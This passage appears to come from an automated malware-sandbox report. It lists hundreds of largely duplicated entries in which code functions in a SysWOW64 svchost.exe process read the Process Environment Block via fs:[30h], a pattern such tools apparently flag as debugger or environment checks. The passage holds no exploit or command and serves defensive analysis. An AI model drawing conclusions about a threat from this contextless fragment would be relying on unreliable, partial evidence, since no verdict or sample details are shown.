Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030392C5 mov eax, dword ptr fs:[00000030h]	1_2_030392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030392C5 mov eax, dword ptr fs:[00000030h]	1_2_030392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B2D3 mov eax, dword ptr fs:[00000030h]	1_2_0302B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B2D3 mov eax, dword ptr fs:[00000030h]	1_2_0302B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B2D3 mov eax, dword ptr fs:[00000030h]	1_2_0302B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305F2D0 mov eax, dword ptr fs:[00000030h]	1_2_0305F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305F2D0 mov eax, dword ptr fs:[00000030h]	1_2_0305F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031052E2 mov eax, dword ptr fs:[00000030h]	1_2_031052E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EF2F8 mov eax, dword ptr fs:[00000030h]	1_2_030EF2F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030292FF mov eax, dword ptr fs:[00000030h]	1_2_030292FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]	1_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]	1_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03031131 mov eax, dword ptr fs:[00000030h]	1_2_03031131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03031131 mov eax, dword ptr fs:[00000030h]	1_2_03031131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]	1_2_0302B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]	1_2_0302B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]	1_2_0302B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]	1_2_0302B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03105152 mov eax, dword ptr fs:[00000030h]	1_2_03105152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]	1_2_03029148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]	1_2_03029148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]	1_2_03029148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]	1_2_03029148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C3140 mov eax, dword ptr fs:[00000030h]	1_2_030C3140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C3140 mov eax, dword ptr fs:[00000030h]	1_2_030C3140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C3140 mov eax, dword ptr fs:[00000030h]	1_2_030C3140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03037152 mov eax, dword ptr fs:[00000030h]	1_2_03037152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]	1_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]	1_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]	1_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]	1_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C9179 mov eax, dword ptr fs:[00000030h]	1_2_030C9179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]	1_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]	1_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]	1_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03087190 mov eax, dword ptr fs:[00000030h]	1_2_03087190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]	1_2_030E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]	1_2_030E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]	1_2_030E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]	1_2_030E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304B1B0 mov eax, dword ptr fs:[00000030h]	1_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]	1_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]	1_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306D1D0 mov eax, dword ptr fs:[00000030h]	1_2_0306D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306D1D0 mov ecx, dword ptr fs:[00000030h]	1_2_0306D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031051CB mov eax, dword ptr fs:[00000030h]	1_2_031051CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]	1_2_030551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030351ED mov eax, dword ptr fs:[00000030h]	1_2_030351ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D71F9 mov esi, dword ptr fs:[00000030h]	1_2_030D71F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]	1_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]	1_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]	1_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]	1_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]	1_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]	1_2_030F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]	1_2_030F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]	1_2_030F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]	1_2_030F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]	1_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]	1_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D705E mov ebx, dword ptr fs:[00000030h]	1_2_030D705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D705E mov eax, dword ptr fs:[00000030h]	1_2_030D705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B052 mov eax, dword ptr fs:[00000030h]	1_2_0305B052
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]	1_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B106E mov eax, dword ptr fs:[00000030h]	1_2_030B106E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03105060 mov eax, dword ptr fs:[00000030h]	1_2_03105060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov ecx, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]	1_2_03041070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]	1_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AD070 mov ecx, dword ptr fs:[00000030h]	1_2_030AD070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]	1_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BD080 mov eax, dword ptr fs:[00000030h]	1_2_030BD080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BD080 mov eax, dword ptr fs:[00000030h]	1_2_030BD080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302D08D mov eax, dword ptr fs:[00000030h]	1_2_0302D08D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03035096 mov eax, dword ptr fs:[00000030h]	1_2_03035096
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305D090 mov eax, dword ptr fs:[00000030h]	1_2_0305D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305D090 mov eax, dword ptr fs:[00000030h]	1_2_0305D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306909C mov eax, dword ptr fs:[00000030h]	1_2_0306909C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]	1_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]	1_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031050D9 mov eax, dword ptr fs:[00000030h]	1_2_031050D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AD0C0 mov eax, dword ptr fs:[00000030h]	1_2_030AD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AD0C0 mov eax, dword ptr fs:[00000030h]	1_2_030AD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]	1_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030590DB mov eax, dword ptr fs:[00000030h]	1_2_030590DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030550E4 mov eax, dword ptr fs:[00000030h]	1_2_030550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030550E4 mov ecx, dword ptr fs:[00000030h]	1_2_030550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]	1_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]	1_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]	1_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03037703 mov eax, dword ptr fs:[00000030h]	1_2_03037703
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03035702 mov eax, dword ptr fs:[00000030h]	1_2_03035702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03035702 mov eax, dword ptr fs:[00000030h]	1_2_03035702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]	1_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]	1_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]	1_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306F71F mov eax, dword ptr fs:[00000030h]	1_2_0306F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306F71F mov eax, dword ptr fs:[00000030h]	1_2_0306F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EF72E mov eax, dword ptr fs:[00000030h]	1_2_030EF72E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03033720 mov eax, dword ptr fs:[00000030h]	1_2_03033720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304F720 mov eax, dword ptr fs:[00000030h]	1_2_0304F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304F720 mov eax, dword ptr fs:[00000030h]	1_2_0304F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304F720 mov eax, dword ptr fs:[00000030h]	1_2_0304F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F972B mov eax, dword ptr fs:[00000030h]	1_2_030F972B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]	1_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]	1_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310B73C mov eax, dword ptr fs:[00000030h]	1_2_0310B73C
